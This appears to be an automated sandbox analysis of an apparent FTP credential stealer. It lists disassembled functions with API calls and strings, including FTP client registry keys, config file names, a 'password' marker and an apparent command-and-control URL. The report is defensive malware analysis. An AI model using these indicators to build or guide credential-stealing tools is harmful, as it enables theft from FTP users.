Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
Instruction ID: 4dafb1f052c8dde12143e590320f2d7fd46cce7fa02554cd8ebf7238d74450ed
Opcode Fuzzy Hash: f380ec298d3e7d0e7bb2719177cca8e66ea60fdd4146e6aa69eb770d0516df7b
Instruction Fuzzy Hash: 46214B31A00109EEDF119E94CD82FEF7BB9EB81358F104176F900A61B0E778AA91DB59

Function 00406DF5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

"password" : ", xrefs: 00406E3F, 00406E52

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: c8fa2ec8a3e59c54122be54d69145ff3b9444bd83a5b570016119b1df7d94bfa
Instruction ID: 6fab804b68c5b12f2ad2aa84cd87e6c6c7010ce87f2ebf3d142809ba573f1ed0
Opcode Fuzzy Hash: c8fa2ec8a3e59c54122be54d69145ff3b9444bd83a5b570016119b1df7d94bfa
Instruction Fuzzy Hash: E721BB32800209BECF11ABA1CC02DEF7E66AF50344F214537F806B51A1E6394EA1E7E9

Function 0040D0F6 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040D140

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

FTP File%d, xrefs: 0040D137
SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D105, 0040D14E
FTP Count, xrefs: 0040D100

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: ed83a99d3c96ef1c00418dac7fe79ce2922a5a3acc90d94c9a00f3b91135bd3a
Instruction ID: 4381d0feb127fee54f3a84f3af93957ec257e30dc424e4290f97af7815e85e35
Opcode Fuzzy Hash: ed83a99d3c96ef1c00418dac7fe79ce2922a5a3acc90d94c9a00f3b91135bd3a
Instruction Fuzzy Hash: A3012C71D00109BADF11BAD1CC82EEE7A79AF00304F9085B7B810B51E1DBBD9B999A59

Function 00401216 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401226
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040124A
CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401256

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
Instruction ID: aed9a798a82424e29e86fb4d6860d5487fec7a9f4572c56382ed939f2aa806a9
Opcode Fuzzy Hash: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
Instruction Fuzzy Hash: 08F0F931A4010CBAEF22AB61DC02FDDBA79AB24749F1080A6B554F40E0D7B99BD99B14

Function 00401C93 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401CB4
lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: 6a6bb444d751dc1b0010ae33392c2bbbe9a965a8df87d9ba58856e5dde5492e4
Instruction ID: 866bfbedeafafde08c2bee9fe9cbb11584a7d4ec80a94fa2542d90e961c12a7e
Opcode Fuzzy Hash: 6a6bb444d751dc1b0010ae33392c2bbbe9a965a8df87d9ba58856e5dde5492e4
Instruction Fuzzy Hash: 2AF0177150020CBBEF016F61CC81ADE3A58AB503ACF00C12ABC1958262D7BDCAC4AB98

Function 00401C3F Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401C60
lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: 9a0f3187f51665ea0ac82ef3bf2c39c32ff20c50b64f94c96ea9f74d2850344c
Instruction ID: 2ccc96f8f4a00b18c61e96875fe2ff250938ad2f4b26475bf95d09c4eb0a8a34
Opcode Fuzzy Hash: 9a0f3187f51665ea0ac82ef3bf2c39c32ff20c50b64f94c96ea9f74d2850344c
Instruction Fuzzy Hash: 7CF0AC7154030CBBDF017F61CC81A9E3A58AB1536CF00D52AB92A59262D7BDCAD49B98

Function 00401CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401D23

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401D58
RLA, xrefs: 00401D3C

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: RLA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 1254228173-1568935434
Opcode ID: a508656fb7d6c21292a83b02f990a3b04465742859524da43eef899cc6c940a9
Instruction ID: 08f3cabee50476261f007a3996d69b32631a763a3fa92a32f6b4e4254e47f6ee
Opcode Fuzzy Hash: a508656fb7d6c21292a83b02f990a3b04465742859524da43eef899cc6c940a9
Instruction Fuzzy Hash: BA017132A00605FBDB209BA0DD01F9AB7A5AF40754F248177F115BA2E0E778AA40DB99

Function 0040FAFC Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00403E3C: WSAStartup.WSOCK32(00000101,?), ref: 00403E51

Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FB9A

Strings

http://6.magicalomaha.co/forum/viewtopic.php, xrefs: 0040FB4A, 0040FB66
Client Hash, xrefs: 0040FBBD

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: SleepStartup
String ID: Client Hash$http://6.magicalomaha.co/forum/viewtopic.php
API String ID: 1372284471-71643543
Opcode ID: e5c4103a3b1c4370ac9b790015c18acca5626cd5fbe554ede3e0c1e2e77852e5
Instruction ID: bd969abef3c94c19d149e5ad6d2df461307f3594a610c58dfbd981d64c0cc690
Opcode Fuzzy Hash: e5c4103a3b1c4370ac9b790015c18acca5626cd5fbe554ede3e0c1e2e77852e5
Instruction Fuzzy Hash: 1721E03190024A9ADF31ABD1C955BFF76B8AB40349F64003BE240719D1D7BC6A8DDF6A

Function 00409EDC Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00849868,Odin), ref: 00409F2E

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

SiteInfo.QFP, xrefs: 00409F04, 00409F43
Odin, xrefs: 00409F28

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: d89bb5812699bbab7ff915cd692d3dab3779f20f334e3563dbb6d7bbc46ba9fc
Instruction ID: 2bd66190c2b6516a536f6296de54229ce0ad04f38d011e686685beed88ee443e
Opcode Fuzzy Hash: d89bb5812699bbab7ff915cd692d3dab3779f20f334e3563dbb6d7bbc46ba9fc
Instruction Fuzzy Hash: 3A01D270A041057AEB2137218C02FAE3E599F81354F24407BBA08F51E3DABC9E8187AC

Function 0040740C Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040741F
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407453
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074B6

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
Instruction ID: 155f66e0a3eb4ed45e6c31c6170a54985ca42cf8ad1f2557258d09283c9eb503
Opcode Fuzzy Hash: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
Instruction Fuzzy Hash: 4C111C3180010CBADF21AF90CC41BDEBBB9BF04304F1081B6B614B41A1DBB9AB959F99

Function 0040F1D7 Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F1EA
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F21E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F278

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: bba7855a52f87d8d52e8a5e88adb8c8ca694f631aba0f96df78014c251771091
Instruction ID: 7017fd83e19b502adcb907764abf0477eb306f287b39071005cb36938cbed895
Opcode Fuzzy Hash: bba7855a52f87d8d52e8a5e88adb8c8ca694f631aba0f96df78014c251771091
Instruction Fuzzy Hash: FC113035D0020CBADF21AFA0CC42FEE7B79BF00304F1084BAB514740A1DBB99A95AF58

Function 00403641 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00403650
connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: closesocketconnectsocket
String ID:
API String ID: 643388700-0
Opcode ID: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
Instruction ID: 0f4e70b3c385995e94c185cadd9b4dcc0b5eff5d6ab24c1b6e743b0ce68c8e52
Opcode Fuzzy Hash: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
Instruction Fuzzy Hash: 63018870904208BADB309E65CC81BEE775DAB00329F108E3BB525A53D1D7BE96848E5A

Function 0040F138 Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F14B
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F17B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F1CE

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 940382a54b7a00bc654334baa91ef29c1e97f4576270b3f892e2d1d334684ca6
Instruction ID: 8e3455aed7961dffbf20232922aa9c977cc65fb5afe4b3b44f93b40fe4c3dbae
Opcode Fuzzy Hash: 940382a54b7a00bc654334baa91ef29c1e97f4576270b3f892e2d1d334684ca6
Instruction Fuzzy Hash: F7112A3190410CBADF21AF90CC42BEE7B79BF04304F1084B6B614B41A1DBB99A95AB98

Function 0040C99F Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040C9D6

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040C9B8
EasyFTP, xrefs: 0040C9CE

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 25aebd4e492a327640deb57bcd3e7bddbf5097bb71dcd0c202626d929b94dc4d
Instruction ID: 7873a25fe67d61e736d5ba7eb95c8ac146f25758c61c21fddb3f31f6913e4213
Opcode Fuzzy Hash: 25aebd4e492a327640deb57bcd3e7bddbf5097bb71dcd0c202626d929b94dc4d
Instruction Fuzzy Hash: 8DF03670A40208BAEF117B61CC43F9D7E659F00748F60417BB514B41F1DBB99F519A5C

Function 00403DD8 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(00000000,?), ref: 00403DF4
GlobalLock.KERNEL32(?), ref: 00403E0B

Part of subcall function 00403C26: InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99

GlobalUnlock.KERNEL32(?), ref: 00403E28

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Global$CrackFromInternetLockStreamUnlock
String ID:
API String ID: 1075796459-0
Opcode ID: 831efcc108d02bad90e9e1e76d0c2f7364eb8ea273fe8039ab1153499a6696f6
Instruction ID: 0fc2f376dfeef626b66e1d29bc1a390a64e8a5b62cb5dc3ba2aecaad03027e41
Opcode Fuzzy Hash: 831efcc108d02bad90e9e1e76d0c2f7364eb8ea273fe8039ab1153499a6696f6
Instruction Fuzzy Hash: 64F0493050010CBBDF01AFA5CC45AEE7F69EB04319F10863AB924A41F1D7B98FA0EB58

Function 00407CA3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CC7

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

\32BitFtp.ini, xrefs: 00407CD7

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: c1c9420d2c9bf62fcf05cf12e1ba98b2d6c89d1368bcba0e4347569d0588de16
Instruction ID: 1d698cb5d94abc71a6ae30598f63509fb673ef8b4ae26f9c95abbd2df378e4bf
Opcode Fuzzy Hash: c1c9420d2c9bf62fcf05cf12e1ba98b2d6c89d1368bcba0e4347569d0588de16
Instruction Fuzzy Hash: 09F08271A0010CBAEB20BB61CC42FDE7A299B40348F504437BA04F51E2DABDEB80575D

Function 00401D7D Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DA9
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DB6

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
Instruction ID: 90587616b231e62f0ce0a1ca71656843b80ecc2effe649e52ec39507118c715a
Opcode Fuzzy Hash: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
Instruction Fuzzy Hash: 10E04F7235024437EB3115699C83F5A3AC85B11B58F104432B641BD2D1D5E9F9C1466C

Function 0040E391 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040E3CE

Strings

.xml, xrefs: 0040E3DD

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: f4ee19a40337aae6af9bebaea52dffb814ff37b80b60d162c1506df385f6728c
Instruction ID: 82dfe2a676b0c618229c0b4738605abde89c85a807fc6a32c104a7e913921a9b
Opcode Fuzzy Hash: f4ee19a40337aae6af9bebaea52dffb814ff37b80b60d162c1506df385f6728c
Instruction Fuzzy Hash: BBF03031800108FBDF11AF91CC42DCD7B76AB54318F208566B520B51E0D7B99BA4EB58

Function 00401E00 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401E0D

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401E28

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandLocalStrings$AllocFree
String ID:
API String ID: 2376306162-0
Opcode ID: d1b2027d67d1c4240f6d427ce8b68f1f50c6128f11c33743b5ffd30317e8e35e
Instruction ID: 24368c84768ad20674b47a6cedeb084af262bdde019d902b2cc9b9c42f429847
Opcode Fuzzy Hash: d1b2027d67d1c4240f6d427ce8b68f1f50c6128f11c33743b5ffd30317e8e35e
Instruction Fuzzy Hash: 91E01271A00109FBDF11AAB1CD02FAF7A69AB10388F2045367D14F51F1D7799F50A69C

Function 00403607 Relevance: 3.0, APIs: 2, Instructions: 22networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(?), ref: 0040360D
gethostbyname.WSOCK32(?,?), ref: 0040361A

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: f4fb47d62413f7430a268c9619c83db832305ddf263421df52fa112740a6aecf
Instruction ID: ba5725e39e640fc153ccdb2a9025af856a0b7f2c782c872154f291422b6e1ce5
Opcode Fuzzy Hash: f4fb47d62413f7430a268c9619c83db832305ddf263421df52fa112740a6aecf
Instruction Fuzzy Hash: DAE04F30200505BBCA209E29D8018553A996B123797504B23F130DB3F0D7BADD839B49

Function 00403691 Relevance: 3.0, APIs: 2, Instructions: 16networkCOMMON

Download Yara Rule

APIs

connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7

